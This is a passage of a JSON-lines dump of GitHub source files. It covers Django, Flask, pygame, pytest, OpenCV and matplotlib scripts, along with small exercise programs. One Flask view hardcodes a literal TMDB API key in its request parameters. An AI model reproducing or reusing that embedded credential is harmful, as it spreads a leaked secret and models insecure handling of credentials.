not assets:\n self.warning(\"ServerFactory.restore_artifacts - item '%s' has no artifacts\", item.id, item=item)\n return\n if not artifacts_path:\n artifacts_path = self.get_artifacts_directory()\n for asset in assets:\n cache_path = self.get_cache_asset(item, \"data\", asset[\"id\"])\n artifact_path = os.path.join(artifacts_path, asset[\"id\"])\n if symlink:\n # when running locally we can symlink files and save time\n os.symlink(cache_path, artifact_path)\n else:\n # when building docker images we need to really copy the files\n shutil.copyfile(cache_path, artifact_path)\n\n ##\n ## Log methods\n ##\n\n def 
_prepare_log(self, msg, *args, **kwargs):\n \"\"\" Add contextual items to the log record \"\"\"\n msg, args, kwargs = super()._prepare_log(msg, *args, **kwargs)\n for item_name in (\"endpoint\", \"token\", \"job\", \"request\"):\n item = self.get_attribute(item_name, None)\n if item:\n kwargs[\"extra\"][item_name] = item\n return msg, args, kwargs\n\n ##\n ## Factory methods\n ##\n\n def get_item(self, item_id):\n \"\"\" Loads a model from database given its id whose prefix determines the model type, eg: ws_xxx for Workspace. \"\"\"\n # TODO limit access to objects available with request credentials\n assert isinstance(item_id, str), \"Factory.get_item - item_id should be a string with a valid item identifier\"\n try:\n if item_id.startswith(analitico.DATASET_PREFIX):\n return api.models.Dataset.objects.get(pk=item_id)\n if item_id.startswith(analitico.ENDPOINT_PREFIX):\n return api.models.Endpoint.objects.get(pk=item_id)\n if item_id.startswith(analitico.JOB_PREFIX):\n return api.models.Job.objects.get(pk=item_id)\n if item_id.startswith(analitico.MODEL_PREFIX):\n return api.models.Model.objects.get(pk=item_id)\n if item_id.startswith(analitico.NOTEBOOK_PREFIX):\n return api.models.Notebook.objects.get(pk=item_id)\n if item_id.startswith(analitico.RECIPE_PREFIX):\n return api.models.Recipe.objects.get(pk=item_id)\n if item_id.startswith(analitico.WORKSPACE_PREFIX):\n return api.models.Workspace.objects.get(pk=item_id)\n if item_id.startswith(analitico.AUTOML_PREFIX):\n return api.models.Automl.objects.get(pk=item_id)\n except Exception as exc:\n self.warning(\"get_item: could not find item %s\", item_id)\n raise exc\n try:\n validate_email(item_id)\n return api.models.User.objects.get(email=item_id)\n except validate_email.ValidationError:\n pass\n self.warning(\"get_item: could not find item type for %s\", item_id)\n raise NotFound(\"ServerFactory.get_item - could not find given item type \" + item_id)\n\n ##\n ## with Factory as: lifecycle methods\n ##\n\n def __exit__(self, exception_type, exception_value, traceback):\n \"\"\" Delete any temporary files upon exiting \"\"\"\n if self._temp_directory:\n shutil.rmtree(self._temp_directory, ignore_errors=True)\n\n\n# shared instance of server side factory\nfactory = ServerFactory()\n","repo_name":"analitico/analitico","sub_path":"source/api/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":9243,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"18251624484","text":"from flask import render_template\nfrom app import app\nfrom urllib import request, parse\nimport json\n\n\n@app.route('/')\ndef index():\n title = \"Flask -- Working with Apis and json data\"\n\n requestVariables = {\n \"api_key\": '22f3e85e05becdb7e502c1f391dbd90d',\n 'limit': '10'\n }\n\n encodeVars = parse.urlencode(requestVariables)\n API_BASE_URL = 'https://api.themoviedb.org/3/movie/popular?'\n req_open = request.urlopen(API_BASE_URL + encodeVars)\n req_read = req_open.read()\n req_json = json.loads(req_read)\n movies = req_json['results']\n # img = 'https://image.tmdb.org/t/p/w500/'+ poster_path\n\n return render_template('index.html', title=title, movies=movies)\n","repo_name":"otienosteve/python_api_call-no-frameworks-used","sub_path":"John-Njau/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20121357402","text":"#!/usr/bin/python3\n\nimport pygame\nfrom yogini import Yogini\nimport sequences\n\nsuccesses, failures = pygame.init()\n\nscreen = pygame.display.set_mode((1280, 720))\n# screen = pygame.display.set_mode((0, 0), pygame.RESIZABLE)\nclock = pygame.time.Clock()\nFPS = 60\n\n# create the yogini\nyogini = Yogini()\nssize = pygame.display.get_surface().get_size()\nyogini.body.pos = [ssize[0] / 2, ssize[1] / 2]\nyogini.sequence = sequences.ashtanga\n\ntime = 0\n\nrunning = True\nwhile running:\n # Returns milliseconds between each call to 'tick'. The convert time to seconds.\n dt = clock.tick(FPS) / 1000\n time += dt\n screen.fill((255, 218, 148)) # Fill the screen with background color.\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.VIDEORESIZE:\n yogini.body.pos = [event.w / 2, event.h / 2]\n\n # let the yogini live\n yogini.live(time)\n\n # ...and draw it\n yogini.draw(screen)\n\n pygame.display.update()\n\nprint(\"Exited the game loop. Game will quit...\")\n","repo_name":"simon123h/pyogini","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"29305517641","text":"\"\"\"djangomom URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^projects/', include('project.urls',\n namespace='projects')),\n url(r'^apps/', include('app.urls',\n namespace='apps')),\n url(r'^models/', include('modeller.urls',\n namespace='models')),\n url(r'^account/', include('account.urls',\n namespace='account')),\n url(r'^', include('core.urls',\n namespace='core')),\n url(r'^endpoint/', include('endpoint.urls',\n namespace='endpoint')),\n url(r'^serializer/', include('serializer.urls',\n namespace='serializer')),\n]\n","repo_name":"emiamar/djangomom","sub_path":"djangomom/djangomom/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38522014574","text":"import cv2\nimport os\n\n\ndef remove_blurry_images(src_folder):\n img_names_list = os.listdir(src_folder)\n\n for img in img_names_list:\n if img.endswith('.jpeg'):\n img2 = cv2.imread(src_folder+img, cv2.IMREAD_GRAYSCALE)\n laplacian_var = cv2.Laplacian(img2, cv2.CV_64F).var()\n if laplacian_var < 10:\n print(img + \" :Image blurry\")\n os.remove(src_folder+img)\n\nremove_blurry_images(src_folder = '../processed_299_299/')","repo_name":"rishabkatta/Diabetic-Retinopathy-Detection","sub_path":"preprocessing_scripts/remove_blurry_images.py","file_name":"remove_blurry_images.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6183891636","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom pandas.api.types import is_numeric_dtype\nimport fiona\nimport rasterio\nfrom shapely.geometry import box\nimport pytest\nfrom gisutils import shp2df\nfrom mfexport.list_export import mftransientlist_to_dataframe\nfrom mfexport.inputs import export, summarize\nfrom .test_results_export import check_files, compare_polygons\n\n\ndef test_model_export(model):\n m, grid, output_path = model\n outfiles = export(m, grid, output_path=output_path)\n # TODO : add some checks\n assert True\n\n\ndef test_packages_export(model):\n m, grid, output_path = model\n packages = ['dis'] # 'wel'\n outfiles = export(m, grid, packages[0], output_path=output_path)\n # TODO : add some checks\n assert True\n\n\ndef test_package_export(model):\n # if 'package' is argued instead of 'packages'\n m, grid, output_path = model\n variables = ['thickness', 'top', 'botm']\n layers = list(range(get_nlay(m)))\n if m.version == 'mf6':\n variables.append('idomain')\n outfiles = export(m, grid, package='dis', output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef get_nlay(model):\n if model.version == 'mf6':\n nlay = model.dis.nlay.array\n else:\n nlay = model.dis.nlay\n return nlay\n\n\ndef get_nrow_ncol_nlay_nper(model):\n if model.version == 'mf6':\n nlay = model.dis.nlay.array\n nrow = model.dis.nrow.array\n ncol = model.dis.ncol.array\n nper = model.nper\n else:\n nrow, ncol, nlay, nper = model.nrow_ncol_nlay_nper\n return nrow, ncol, nlay, nper\n\n\ndef test_variables_export(model):\n m, grid, output_path = model\n variables = ['top', 'thickness']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid,\n variables=variables,\n output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_variable_export(model):\n # if 'package' is argued instead of 'packages'\n m, grid, output_path = model\n variables = ['botm']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid, variable='botm', output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_transient2d_bar_graph(model):\n # if 'package' is argued instead of 'packages'\n m, grid, output_path = model\n variables = ['recharge']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid, variable=variables, output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_export_irch(shellmound):\n m, grid, output_path = shellmound\n variables = ['irch']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid, variable='irch', output_path=output_path)\n n_unique_pers = len(set(m.rch.irch.array.sum(axis=(1, 2, 3))))\n # should be a pdf and tif for each unique period\n assert len(outfiles) == n_unique_pers * 2\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_variable_export_with_package(model):\n m, grid, output_path = model\n variables = ['botm']\n packages = ['dis']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid,\n packages=packages,\n variables=variables,\n output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_summary(model):\n m, grid, output_path = model\n df = summarize(m, output_path=output_path)\n # TODO : add some checks\n assert True\n\n\ndef test_package_list_export(model):\n m, grid, output_path = model\n packages = ['dis', 'rch'] #, 'wel']\n variables = ['botm', 'top', 'thickness', 'idomain', 'rech', 'recharge'] #, 'wel']\n if m.version == 'mf6':\n 
variables.append('irch')\n nrow, ncol, nlay, nper = get_nrow_ncol_nlay_nper(m)\n layers = list(range(nlay))\n outfiles = []\n for package in packages:\n outfiles += export(m, grid, package, output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n tifs = [f for f in outfiles if f.endswith('.tif')]\n for f in tifs:\n with rasterio.open(f) as src:\n assert src.width == ncol\n assert src.height == nrow\n compare_polygons(grid.bbox, box(*src.bounds))\n shps = [f for f in outfiles if f.endswith('.shp')]\n for f in shps:\n with fiona.open(f) as src:\n assert box(*src.bounds).within(grid.bbox)\n\n\ndef test_transient_list_export(model):\n m, grid, output_path = model\n outfiles = export(m, grid, 'wel', output_path=output_path)\n variables = ['wel0_stress_period_data']\n if m.version != 'mf6':\n variables = ['wel_stress_period_data']\n check_files(outfiles, variables=variables)\n df = mftransientlist_to_dataframe(m.wel.stress_period_data, squeeze=True)\n df.index = range(len(df))\n if 'cellid' in df.columns:\n df['cellid'] = df['cellid'].astype(str)\n df2 = shp2df(outfiles[0]).drop('geometry', axis=1)\n numeric_cols = [c for c in df.columns if is_numeric_dtype(df[c].dtype)]\n assert np.allclose(df[numeric_cols], df2[numeric_cols])\n\n\ndef test_export_sfr(model):\n m, grid, output_path = model\n # mf2005 style SFR export not implemented yet\n # TODO: implement mf2005 sfr package export\n if m.version != 'mf6':\n return\n outfiles = export(m, grid, 'sfr', output_path=output_path)\n # TODO: finish this test\n variables = ['shellmound.sfr']\n if m.version != 'mf6':\n variables = ['wel_stress_period_data']\n df = pd.DataFrame(m.sfr.reach_data.array)\n compare_cols = ['strtop']\n else:\n df = pd.DataFrame(m.sfr.packagedata.array)\n compare_cols = ['rlen', 'rwid', 'rgrd', 'rtp', 'rbth', 'rhk']\n check_files(outfiles, variables=variables)\n df.index = range(len(df))\n if 'cellid' in df.columns:\n df['cellid'] = df['cellid'].astype(str)\n df2 = shp2df(outfiles[0]).drop('geometry', axis=1)\n df2['cellid'] = list(zip(df2['k'], df2['i'], df2['j']))\n df2['cellid'] = df2['cellid'].astype(str)\n assert np.allclose(df[compare_cols], df2[compare_cols])","repo_name":"aleaf/modflow-export","sub_path":"mfexport/tests/test_model_export.py","file_name":"test_model_export.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"}
+{"seq_id":"40620596491","text":"n = int(input())\na = list(map(int, input().split()))\nma, mi = a[0], a[0]\nans1, ans2 = 0, 0\nfor v in a:\n if v > ma:\n ans1 += 1\n ma = v\n if v < mi:\n ans2 += 1\n mi = v\nprint(ans1, ans2)","repo_name":"wiwitrifai/competitive-programming","sub_path":"hackerrank/university-codesprint-2/breaking.py","file_name":"breaking.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"}
+{"seq_id":"86737707380","text":"print(\"\\n\\t\\tA partir dos valores da aceleração (a em m/s2), da velocidade inicial (v0 em m/s)\" +\n \"\\n\\t\\te do tempo de percurso (t em s). Calcular e exibir a velocidade final de automóvel em km/h.\")\n\naceleracao = float(input(\"\\n\\n\\t\\tDigite a aceleração do veiculo (em metros por segundo): \"))\nvelocidadeinicial = float(input(\"\\n\\t\\tDigite a velocidade inicial do veiculo (em km por hora): \"))\ntempo = float(input(\"\\n\\t\\tDigite o tempo do percurso do veiculo (em segundos): \"))\n\n# V = v0 + a. t\n\nsegundoconvertido = tempo * 60\naceleracaoconvertida = aceleracao / 3.6\nvelocidadefinal = velocidadeinicial+ (aceleracaoconvertida*segundoconvertido)\n\nif velocidadefinal <= 40:\n print(\"\\n\\t\\tVeiculo muito LENTO.\")\nelif (velocidadefinal > 40) & (velocidadefinal <= 60):\n print(\"\\n\\t\\tVeiculo em velocidade PERMITIDA.\")\nelif (velocidadefinal > 60) & (velocidadefinal <= 80):\n print(\"\\n\\t\\tVeiculo RAPIDO.\")\nelif velocidadefinal > 120:\n print(\"\\n\\t\\tVeiculo MUITO RAPIDO.\")\n","repo_name":"M4NS0/homeworks","sub_path":"Python/Lógica de Programação I/Exercícios/Lista4/exercicio06.py","file_name":"exercicio06.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34414828365","text":"import pygame\nimport os,sys\npygame.init()\n\nSCREENHEIGHT = 480\nSCREENWIDTH = 640\nscreen = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT))\npygame.display.set_caption(\"Testing text\")\nbackground = pygame.Surface(screen.get_size())\nbackground = background.convert()\nFonz = pygame.font.Font(None,40)\ncount = 0\ndone = False\nclock = pygame.time.Clock()\nwhile not done:\n clock.tick(30)\n background.fill((255,255,255))\n \n screen.blit(background,(0,0))\n count += 1\n screen.blit(Fonz.render(\"Hello\",True,(0,0,0),(150,255,255)),(count,20))\n pygame.display.flip()\n\npygame.quit()","repo_name":"montepy/PyBullet","sub_path":"TextTesting/TextTesting/TextTesting.py","file_name":"TextTesting.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72604958889","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom astropy.io import ascii\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\nplt.rcParams['xtick.major.size'] = 9\nplt.rcParams['xtick.major.width'] = 2\nplt.rcParams['xtick.minor.size'] = 6\nplt.rcParams['xtick.minor.width'] = 1\nplt.rcParams['ytick.major.size'] = 9\nplt.rcParams['ytick.major.width'] = 2\nplt.rcParams['ytick.minor.size'] = 6\nplt.rcParams['ytick.minor.width'] = 1\nplt.rcParams['axes.linewidth'] = 2\nplt.rcParams['font.size']=15\nplt.rcParams['mathtext.default']='regular'\nplt.rcParams['lines.markersize']=8\nplt.rcParams['xtick.major.pad']='3'\nplt.rcParams['ytick.major.pad']='3'\nplt.rcParams['ytick.minor.visible'] = 'True'\nplt.rcParams['xtick.minor.visible'] = 'True'\nplt.rcParams['xtick.direction'] = 'inout'\nplt.rcParams['ytick.direction'] = 'inout'\nplt.rcParams['ytick.right'] = 'True'\nplt.rcParams['xtick.top'] = 'True'\n\n# use a color-blind friendly palette\n# orange, red, light blue, dark blue\ncolors=['#FF9408','#DC4D01','#00A9E0','#016795']\n\n#dat=ascii.read('sample/scatter10.csv')\ndat=ascii.read('data/scatter-all.csv')\n#dat=ascii.read('data/scatter-all-fullsecs.csv')\n\nix,un=np.unique(dat['ticids'],return_index=True)\ndat=dat[un]\n\num=np.where(dat['teff'] < 8000.)[0]\nprint(len(um),'unique stars with Teff < 8000K')\n\nplt.ion()\nplt.clf()\n\nfig = plt.figure(figsize=(6, 8))\n\nupl=16\n\nplt.clf()\ngs = gridspec.GridSpec(2, 1)\n\nax0 = plt.subplot(gs[0, 0])\nplt.scatter(dat['teff'],dat['rad'],c=dat['tmags'],marker='o',alpha=1., vmax=upl, cmap='cubehelix',s=12, rasterized=True)\n#plt.legend(loc='best')\n#plt.plot([8000,4000],[5,3.4],ls='dashed',color='royalblue')\nplt.xlim([8000,2700])\nplt.ylim([0.1,200])\nplt.xlabel('Effective Temperature (K)')\nplt.ylabel('Stellar Radius (Solar)')\nplt.yscale('log')\nplt.annotate(\"(a)\", xy=(0.05, 0.1), xycoords=\"axes fraction\",fontsize=24,color='black')\ncbaxes = inset_axes(ax0, width=\"40%\", height=\"5%\", loc=2) \nplt.colorbar(cax=cbaxes, orientation='horizontal', label='Tmag')\n\nax1 = plt.subplot(gs[1, 0])\num=np.where(dat['teff'] < 8000.)[0]\nplt.semilogy(dat['tmags'][um],dat['rad'][um],'.',color=colors[3], rasterized=True)\nplt.xlabel('TESS Magnitude')\nplt.ylabel('Stellar Radius (Solar)')\nplt.xlim([2,16])\nplt.annotate(\"(b)\", xy=(0.05, 0.82), xycoords=\"axes fraction\",fontsize=24,color='black')\n\nplt.subplots_adjust(wspace=0.20,hspace=0.26,left=0.155,right=0.97,bottom=0.08,top=0.98)\n\n#plt.savefig('fig1.png',dpi=150)\n\n\n#plt.savefig('fig-hrd-all-v2.png',dpi=150)\n\n","repo_name":"danxhuber/tess20sec","sub_path":"sample/fig1.py","file_name":"fig1.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"24031845312","text":"from unittest import TestCase\nfrom unittest.mock import Mock, patch\n\nfrom click.testing import CliRunner\n\nimport empty_host\nfrom cosmicops.objects.host import CosmicHost, RebootAction\n\n\nclass TestEmptyHost(TestCase):\n def setUp(self):\n co_patcher = patch('cosmicops.empty_host.CosmicOps')\n self.co = co_patcher.start()\n self.addCleanup(co_patcher.stop)\n self.co_instance = self.co.return_value\n\n slack_patcher = patch('cosmicops.log.Slack')\n self.mock_slack = slack_patcher.start()\n self.addCleanup(slack_patcher.stop)\n\n self.runner = CliRunner()\n self.host = CosmicHost(Mock(), {\n 'id': 'h1',\n 'name': 'host1',\n 'resourcestate': 'Enabled'\n })\n self.host.disable = Mock(return_value=True)\n self.host.empty = Mock(return_value=(1, 1, 0))\n self.host.reboot = Mock(return_value=True)\n self.host.set_uid_led = Mock()\n self.co_instance.get_host.return_value = self.host\n\n def test_main(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', 'host1']).exit_code)\n self.co.assert_called_with(profile='config', dry_run=False, log_to_slack=True)\n self.co_instance.get_host.assert_called_with(name='host1')\n self.host.disable.assert_called()\n self.host.empty.assert_called()\n self.host.reboot.assert_not_called()\n self.host.set_uid_led.assert_not_called()\n\n def test_skip_disable(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', '--skip-disable', 'host1']).exit_code)\n self.host.disable.assert_not_called()\n self.host.empty.assert_called()\n\n def test_disable_failure(self):\n self.host.disable.return_value = False\n\n self.assertEqual(1, self.runner.invoke(empty_host.main, ['--exec', 'host1']).exit_code)\n self.host.disable.assert_called()\n\n def test_fail_on_empty_host_response(self):\n self.co_instance.get_host.return_value = []\n\n self.assertEqual(1, self.runner.invoke(empty_host.main, ['--exec', 'host1']).exit_code)\n self.co_instance.get_host.assert_called_with(name='host1')\n\n def test_shutdown(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', '--shutdown', 'host1']).exit_code)\n self.host.reboot.assert_called_with(RebootAction.HALT)\n self.host.set_uid_led.assert_called_with(True)\n\n def test_shutdown_with_failed_hosts(self):\n self.host.empty.return_value = (2, 1, 1)\n\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', '--shutdown', 'host1']).exit_code)\n self.host.reboot.assert_not_called()\n self.host.set_uid_led.assert_not_called()\n\n def test_shutdown_failure(self):\n self.host.reboot.return_value = False\n self.assertEqual(1, self.runner.invoke(empty_host.main, ['--exec', '--shutdown', 'host1']).exit_code)\n self.host.reboot.assert_called_with(RebootAction.HALT)\n\n def test_dry_run(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['host1']).exit_code)\n self.co.assert_called_with(profile='config', dry_run=True, log_to_slack=False)\n","repo_name":"MissionCriticalCloud/cosmicOps","sub_path":"tests/test_empty_host.py","file_name":"test_empty_host.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"71823428328","text":"from scripts.helpful_scripts import get_account\nfrom brownie import SimpleStorage\n\n\nimport os\nimport json\nimport yaml\nimport shutil\n\n\ndef deploy_simple_storage(update_front_end=False):\n account = get_account()\n simple_storage = SimpleStorage.deploy({\"from\": account})\n print(f\"Contract deployed at: {simple_storage.address}\")\n\n if update_front_end:\n update_frontend()\n\n\ndef update_frontend():\n # Send the build folder to front-end\n copy_folders_to_front_end(\"./build\", \"./front-end/pages/chain-info\")\n # Send Brownie-config.yaml\n with open(\"brownie-config.yaml\", \"r\") as brownie_config:\n config_dict = yaml.load(brownie_config, Loader=yaml.FullLoader)\n with open(\"./front-end/pages/brownie-config.json\", \"w\") as brownie_config_json:\n json.dump(config_dict, brownie_config_json)\n\n\ndef copy_folders_to_front_end(src, dest):\n if os.path.exists(dest):\n shutil.rmtree(dest)\n shutil.copytree(src, dest)\n\n\ndef main():\n deploy_simple_storage(update_front_end=True)\n","repo_name":"cromewar/Full-Stack-Simple-Storage-Brownie","sub_path":"scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28215438224","text":"def computer(a,b,c):\n\tif c == 1:\n\t\tk = a+b\n\t\t#print(\"和:%0.2f\"%k)\n\telif c == 2:\n\t\tk = a-b\n\t\tprint(\"差:%.02f\"%k)\n\telif c == 3:\n\t\tk = a*b\n\t\t#print(\"积:%.02f\"%k)\n\telif c == 4:\n\t\tif b != 0:\n\t\t\tk = a/b\n\t\t\t#print(\"商:%.02f\"%k)\n\t\telse:\n\t\t\t#print(\"输入格式不对\")\n\t\t\tc = \"输入格式不对\"\n\t\t\treturn c\n\treturn k\na = float(input(\"输入一个数\"))\nb = float(input(\"再输入一个数\"))\nc = int(input(\"输入运算符号: 1.和 2.差 3.乘 4.商\"))\nnumber = computer(a,b,c)\nprint(number)\n","repo_name":"superwenqistyle/1803","sub_path":"15day/计算器.py","file_name":"计算器.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41478736036","text":"### In this HashMap Implementation I am handing collision through chaining method ###\nclass HashMap:\n def __init__(self):\n self.max = 10\n self.arr = [[] for i in range(self.max)]\n \n#################### Hash Function ####################\n def get_hash(self, key):\n h = 0\n for char in key:\n h += ord(char) # ord gives us Ascii value of character \n return h % self.max\n\n################# Function to Add Item in HashMap ###################### \n def __setitem__(self,key, val):\n h = self.get_hash(key)\n found = False\n for idx, element in enumerate(self.arr[h]):\n if len(element) == 2 and element[0] == key:\n self.arr[h][idx] = (key,val) \n found = True\n break\n if not found:\n self.arr[h].append((key,val)) \n\n################# Function to Retrieve/Get Item from HashMap ###################### \n def __getitem__(self, key):\n h = self.get_hash(key)\n for element in self.arr[h]:\n if element[0] == key:\n return element[1]\n\n################# Function to Delete Item from HashMap ###################### \n def __delitem__(self, key):\n h = self.get_hash(key)\n for idx,element in enumerate(self.arr[h]):\n if element[0] == key:\n del self.arr[h][idx]\n\n\nh = HashMap()\n\nh[\"march 5\"] = 10 # Adding key,val pair\nh[\"march 6\"] = 12\nh[\"march 17\"] = 14\n\nprint(h[\"march 6\"])\nprint(h[\"march 17\"])\n\ndel h[\"march 17\"] # Deleting\n\nprint(h[\"march 17\"]) # Print after deleting\n\n\n\n","repo_name":"Najaf-Zawar/Data-Structures-Algorithms-DSA-in-Python","sub_path":"#5_HasMap(Chaining).py","file_name":"#5_HasMap(Chaining).py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20383110543","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n\nclass Institute(models.Model):\n name = models.CharField(\"Название института\",\n max_length=400, unique=True)\n description = models.TextField(\"Информация об институте\",\n default=\"None\", blank=True)\n employees_count = models.IntegerField(\"Число сотрудников\",\n default=1)\n scientist_count = models.IntegerField(\"Число молодых учёных\",\n default=0)\n chairman = models.CharField(\"Ф.И.О. председателя СМУ\",\n max_length=200)\n link = models.URLField(\"Ссылка на сайт института\")\n smu_link = models.URLField(\"Ссылка на сайт СМУ института\",\n null=True, blank=True)\n \n def __str__(self):\n return (f\"Institute(id={self.id}, name=\\\"{self.name}\\\", \"\n f\"info=\\\"{self.description[:50]}...\\\", \"\n f\"link=\\\"{self.link}\\\")\")\n\n\nclass Scientist(models.Model):\n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n queue = models.OneToOneField(\"moderators.Queue\",\n on_delete=models.SET_NULL, null=True)\n institute = models.ForeignKey(Institute, on_delete=models.CASCADE,\n null=True)\n name = models.CharField(\"Имя учёного\", max_length=200)\n lab = models.CharField(\"Лаборатория\", max_length=300)\n position = models.CharField(\"Должность\", max_length=300)\n degree = models.CharField(\"Учёная степень\", max_length=200,\n null=True)\n scientific_interests = models.TextField(\"Сфера научных интересов\")\n \n def __str__(self):\n return (f\"ScientistInfo(id={self.id}, \"\n f\"institute=\\\"{self.institute.name}\\\", \"\n f\"name=\\\"{self.name}\\\", position=\\\"{self.position}\\\", \"\n \"scientific_interests=\"\n f\"\\\"{self.scientific_interests}\\\")\")\n\n\nclass ScientistLink(models.Model):\n scientist = models.ForeignKey(Scientist,\n on_delete=models.CASCADE)\n link = models.URLField(\"Ссылка на профиль\")\n service_name = models.CharField(\"Краткое описание\", max_length=250)\n\n\nclass Grant(models.Model):\n queue = models.OneToOneField(\"moderators.Queue\",\n on_delete=models.SET_NULL, null=True)\n name = models.CharField(\"Название гранта\", max_length=300)\n description = models.TextField(\"Описание гранта\", null=True)\n end_doc_date = models.DateTimeField(\"Дата окончания приёма заявок\",\n null=True)\n end_result_date = models.DateTimeField(\"Дата подведения итогов\",\n null=True)\n criteria = models.TextField(\"Критерии к участникам\", null=True)\n link = models.URLField(\"Ссылка на страницу с грантом\")\n \n def __str__(self):\n return (f\"Grant(id={self.id}, name=\\\"{self.name}\\\", \"\n f\"end_doc_date=\\\"{self.end_doc_date}\\\", \"\n f\"end_result_date=\\\"{self.end_result_date}\\\")\")\n","repo_name":"Jrol123/SYSC_site","sub_path":"smu_site/apps/info/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"21122658731","text":"import constant\nfrom card import HeroClass\nimport logging\nimport multiprocessing\nfrom match_multiprocess import Match\nfrom player.random_player import RandomPlayer\nimport time\nimport numpy\n\n\ndef test_rd_vs_rd_all_fireblast_deck(arg):\n \"\"\" test random vs. random \"\"\"\n match, idx = arg\n return match.play_one_match(idx).name\n\nif __name__ == \"__main__\":\n match_num = 6000\n\n start_health = 30\n deck = constant.mage_fix_deck\n logger = logging.getLogger('hearthstone')\n logger.addHandler(logging.StreamHandler())\n logger.setLevel(logging.WARNING)\n player1 = RandomPlayer(cls=HeroClass.MAGE, name='player1', first_player=True,\n start_health=start_health, fix_deck=deck)\n player2 = RandomPlayer(cls=HeroClass.MAGE, name='player2', first_player=False,\n start_health=start_health, fix_deck=deck)\n # test\n # logger.setLevel(logging.INFO)\n player1.reset(test=True)\n player2.reset(test=True)\n match = Match(player1, player2)\n\n start_time = time.time()\n win_results = []\n p = multiprocessing.Pool()\n for res in p.imap_unordered(test_rd_vs_rd_all_fireblast_deck, [(match, i) for i in range(match_num)]):\n win_results.append(res)\n duration = time.time() - start_time\n\n # print(\"win result:\", win_results)\n print(\"player1 win result:\", numpy.mean(numpy.array(win_results) == \"player1\"))\n print(\"duration:\", duration)","repo_name":"czxttkl/X-AI","sub_path":"useless/AI/play_game_multiprocess.py","file_name":"play_game_multiprocess.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
